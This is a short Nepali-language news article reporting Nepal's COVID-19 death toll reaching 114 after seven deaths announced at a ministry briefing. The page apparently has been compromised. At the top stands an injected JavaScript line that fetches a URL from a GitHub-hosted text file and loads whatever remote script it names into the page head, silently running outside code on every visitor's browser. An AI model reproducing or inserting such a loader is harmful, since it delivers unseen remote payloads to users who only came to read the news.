;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
भदौ ०२,
काठमाडौं । नेपालमा कोरोनाका कारण ज्यान गुमाउनेको संख्या १ सय १४ पुगेको छ । आज (मंगलबार)को नियमित मिडिया ब्रिफिङमा मन्त्रालयका प्रवक्ता डा. जागेश्वर गौतमले आज मात्रै थप ७ जनाको मृत्यु भएको पुष्टि गरे । योसंगै नेपालमा कोरोनाको कारण ज्यान गुमाउनेको संख्या १ सय १४ पुगेको छ ।
पछिल्लो २४ घण्टामा काभ्रे, नवलपरासी, मोरङ, धनुषा, बाँके र कास्कीका एक/एक पुरुष तथा तनहुँकी एक महिला गरी ७ जनाको मृत्यु भएको जानकारी दिनुभयो । योसँगै मृत्यु हुनेको संख्या ११४ पुगेको छ । file Photo
यो पनि पढ्नुहोस्
फेसबुक प्रतिक्रियाहरु